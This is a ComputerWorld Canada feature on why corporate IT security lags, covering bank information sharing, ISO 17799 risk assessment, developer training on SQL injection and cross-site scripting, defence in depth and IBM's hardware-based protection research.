The insecure corporation

When it comes to business, the Canadian enterprise is often a nimble-footed creature capable of outwitting its competition in the blink of an eye. Yet when it comes to IT security, it is often a lead-footed beast, vulnerable to a host of lurking predators. The reality is, outside of a few specific industries, IT security is often more illusion than reality.

A few years ago IBM Corp. did a study, subsequently verified by others, that found on average one software bug per thousand lines of code, a statistic that doesn’t set off any alarms until one realizes most operating systems tally their lines of code in the tens of millions. The resultant situation is that the software used to write this article, the operating system on which it sits, and the firewall technology keeping hackers off of my machine are all full of bugs – some merely a nuisance, some exploitable vulnerabilities. The same can be said for your entire corporate network.

But as a CIO, not all is lost. In fact there are a variety of things that can be done to improve corporate security. Some require time, some require cooperation, all require patience.

Few elite athletes succeed entirely on their own. Barry Bonds’ prodigious homerun production has a lot to do with his incredible understanding of his environment. He reviews video footage of opposing pitchers to understand the probability of events occurring in specific situations. IT security isn’t quite this simple, but much can be learned from viewing others. The best help, ironically, often comes from the least likely source – your competition.

Sharing security best practices

The Canadian banking industry has learned this lesson and as a result is considered by security experts to be at the head of the class. In fact their reputation for IT security is internationally renowned. But it wasn’t always this way.

Robert Garigue, the chief information security officer with BMO Financial Group, knows that he, and by extension his company, can learn from the competition. About four years ago some senior vice-presidents at the major Canadian financial institutions got together to start sharing best practices. Admittedly it wasn’t entirely based on altruism. There was a dose of self-preservation in their reasoning, since banks are heavily connected by business-to-business relationships and third-party services.

“We have an understanding that we are all in the network together, and there is a vested interest in sharing best practices around security,” he said. The banks realized that if one was brought down by a hack, the others were instantly at risk. But even knowing this, sharing was not an easy sell. “I have seen people who were uncomfortable because it has not been the approach in the past. Security used to be seen as more internal protection, and sometimes the horror stories weren’t shared,” Garigue said.

Fortunately, wiser heads prevailed. For the past several years the banks have been sharing information. This year, head security officers from the major Canadian financial intuitions had their first meeting. “There are issues we have to wrestle with; we have shared risk, we have shared dependencies,” said Garigue. “There has been a sense that information security now is a community practice.”

Admittedly, not every industry has the same motivations to share information security best practices. But banking’s track record is enviable. In fact it is the only Canadian industry that consistently receives high marks for both its practices and end results.

Need for risk assessment

If the competition shows no interest in sharing security best practices, industry standards are another option. ISO 17799 is the standard for IT security and “a comprehensive set of controls comprising best practices in information security.” There are ten sections, including everything from security policy and system access control to business continuity management and compliance.

The starting point is risk assessment. It is something most companies do, but not frequently enough, according to experts.

“How do you know how secure you are now, not two weeks ago?” asks Simon Perry, vice-president of eTrust Solutions with Computer Associates plc. “Most companies can’t do that.” In order to do so, a company has to move to “near-real time” reporting on everything from the state of antivirus software to the level of corporate legislative compliance.

To move in this direction some consistent metrics are needed throughout an organization. A classic problem – one Perry has seen time and time again – is when IT change management professionals and security management people use completely different metrics for deciding whether to go ahead with a project. The former changes technology if added functionality is required or a problem needs to be fixed to guarantee an internal service level agreement. The latter is looking to fix vulnerabilities before they are problems, knowing full well they’ll never add functionality and may well take some away. On the surface, he noted, “those two guys have diametrically opposed goals.”

Perry said the solution, as simple as it sounds, is to have the two departments make each other’s acquaintance. In large organizations they may never have met.

Jack Sebbag, Canadian general manager with Network Associates Inc., said for security to work at this level there has to be one person with ownership, usually a chief security officer. When changes are made, he or she can fully inventory what is taking place. But “empowerment must come with the position”, he said. Too often corporate politics has caused CSOs to fail. If CIOs aren’t up to date on security issues they can exacerbate the problem.

Lagging understanding of threats

None of this is too surprising to security experts, who see senior executives often focused on the wrong security targets. For example, “threats today are not really at the network layer and haven’t been so for a couple of years,” said John Alsop, CEO of Borderware. Now almost all of it is application specific, he added. But surveys of senior executives seldom show this level of understanding.

Entire corporate initiatives often float under the security radar. Most of the time it is a non-issue, but when the initiative involves a Web application the story is entirely different.

While the Web is a good delivery method for data, it is a difficult medium to secure since many of the vulnerabilities need nothing more than a Web browser to exploit them, said Matt Fisher, a security engineer with SPI Dynamics.

The vulnerabilities associated with Web applications goes back to the IBM study. Writing totally secure software is impossible.

“We certainly don’t want to say the sky is falling but…no matter how much money we spend, we are ultimately going to find that there is some rate of vulnerability,” said Dave Safford, manager, global security analysis lab with IBM.

“Even at the highest levels you are looking at hundreds or thousands of bugs per million lines of code, even at the very best software shops in the world,” said Richard Reiner, CEO of FSC Internet. “In the work we’ve done for banks…100 per cent of the applications that we have been asked to review in the last year have had at least one critical security vulnerability.”

Garigue isn’t surprised. “You have to understand that this is not the laws of physics that we are dealing with.”

Developers lack training

Web applications are built for user acceptance, business functionality, and are stress tested against traffic loads, but infrequently have security built in at the development phase. “For the most part, developers aren’t taught security,” SPI’s Fisher said.

At a recent Toronto conference, security experts agreed. Developers’ understanding of the importance of security “is still shaky…but it is getting there,” said Tim Dafoe, a senior security designer with the Ontario provincial government. Though he and the other security people he works with are aware of hacking techniques such as SQL injection – SQL queries that allow potentially harmful characters to be used – developers tend not to be. Mike Pill, who manages developers at a municipally run organization, agreed that developers are often unaware of the exploits used by hackers to break their Web creations. “It’s not taught in school,” he said.

On almost every Web site “there will be cross-site scripting and SQL injection [vulnerabilities] – guaranteed,” Fisher said.

Firewalls aren’t going to be a great deal of help since the attack is designed to look like legitimate traffic. Additionally, not all Web application hijackings are going to trigger your intrusion detection system since it may be set to track failed login attempts, rather than, say, repeated ID session requests. “So you can use brute force attacks without triggering alarms,” Fisher said.

Building your own applications carries some risk. “When you’ve built the application, you are the only source of patches,” Reiner said. But off-the-shelf isn’t a dream either, he added. It may sound extreme but Reiner suggests even testing known large scale applications such as ERP. The notion that off-the-shelf software is superior is a fallacy, he said.

The key is to deal with these security problems when they are in their development infancy. To borrow a line from Crosby, Stills and Nash: “Teach your developers well.” The more secure the code is at the outset, the less of a problem in the long run. This may seem like the ultimate no-brainer but it is seldom done, the experts said, and it has practical security ramifications. “Testing activities [after software is built] cannot ever guarantee all the vulnerabilities have been found…you can’t prove a negative,” Reiner warned.

SQL injection threat

One of the reasons simple software vulnerabilities are such a security nightmare is that many developers are looking down from 30,000 feet, seeing the overall functionality of the end product, not what can go wrong at every level.

The SQL injection technique – by far the most lethal attack out there, according to Fisher – requires only one parameter to be hacked to compromise an entire Web site. Something as innocuous as a poorly coded page where a postal code is used to request driving directions from a database can generate enough information for a hacker to subsequently take over the entire site. And since the page in question contains no sensitive customer data, its security is often overlooked.

Reiner said this fundamental problem exists because software is designed with no clear model of what trust relationships exist within an application. “Once the data is in the application, it is trusted.” More sophisticated development shops will have modules within the application that are designed to be skeptical of information. When new information enters those boundaries it is not automatically accepted as being legitimate or “trusted”. He calls this creating “mutually distrusting components”. So hijacking the driving direction page would let you go no further. But “it is a very small minority of organizations that really have a grasp of this stuff – very small.”

At BMO, they use two feedback loops, Garigue said. The first is inside the development cycle and focuses on quality assurance testing in accordance with secure code practices. The second is when the system is set to go live and is going through vulnerability testing. Here new exposures may be found and they are fed back into the QA process to shorten the development cycle. “You have a lot of knowledge transfer that has to go on,” he said. And “to a large extent if you can incorporate that [found] vulnerability into a toolset…you’ve got that knowledge transfer,” he said. “You’ve got a corporate memory, if you want.”

Defence in depth

Yet even if the design level of Web applications has been taken as far as it can, there is an unfortunate trend toward opening up the firewall and having the application “protect itself”, noted Reiner. “Even if you get it all right, it is a single tier of defense and I am increasingly of the opinion that [this] just isn’t good enough.”

Reiner said it’s like telling your CSO that your team has hardened the servers and configuration management to the point firewalls were unnecessary. “He’d tell you you’re crazy,” he said. But with Web applications this attitude is often deemed as being acceptable.

A better solution is true defense in depth, achieved by properly configuring your systems, hardening your operating systems and maintaining a strong change management process. Tie this into a dedicated layer of firewall, intrusion detection and authentication and you get a multiplying effect, Reiner said. And you stand a fighting chance.

Garigue agrees with this strategy. “The defense in depth argument is that you have got boundaries around your firewall…around your servers…around your applications…and around you content.” Security is making sure you have got alignment across those points – “consumer to mainframe”, he said.

But for many the applications are already in place and redeveloping them is impossible. Reiner said about 50 vulnerabilities is a normal find for his teams – maybe half critical and severe, and the rest serious or warnings.

Using hardware for protection

In the future, there may be a way around this if the work IBM is doing in autonomic computing comes to fruition. Web applications will be able to let hardware devices help protect them. In fact much of IBM’s recent work is based on the premise that software is always going to be imperfect, and that it is time to move back to hardware for improved security.

In principle it is quite simple. By spreading data out over multiple servers (much like RAID), each sitting on different operating systems and/or hardware, hackers would have to control a majority of computers to get any data. For example, if the data is spread over an IBM database running on Linux and an Oracle database on Windows, multiple operating systems and applications would have to be hacked to successfully get information. So a credit card number could be parsed out over several servers. Throw in encryption run by a PCI card sitting on the server, and the end result is an essentially unhackable system. Since the PCI card is generating the encryption and decryption, and unreachable from the OS, a hacker who has somehow managed to compromise enough servers would still be left with nothing but encrypted gibberish.

“The bottom line is, if we have software compromised…we can say it doesn’t matter,” IBM’s Safford said.

Whether this technology will solve the problems of large-scale online operations, which may not have the computing power to keep credit cards encrypted at all times, remains to be seen. Safford said IBM should have the technology available within the next three to five years.

Chris Conrath is a department editor at ComputerWorld Canada where he covers security and privacy. He can be reached at [email protected].

Would you recommend this article?

Share

Thanks for taking the time to let us know what you think of this article!
We'd love to hear your opinion about this or any other story you read in our publication.


Jim Love, Chief Content Officer, IT World Canada

Featured Download

Previous article
Next article

Featured Articles

Cybersecurity in 2024: Priorities and challenges for Canadian organizations 

By Derek Manky As predictions for 2024 point to the continued expansion...

Survey shows generative AI is a top priority for Canadian corporate leaders.

Leaders are devoting significant budget to generative AI for 2024 Canadian corporate...

Related Tech News

Tech Jobs

Our experienced team of journalists and bloggers bring you engaging in-depth interviews, videos and content targeted to IT professionals and line-of-business executives.

Tech Companies Hiring Right Now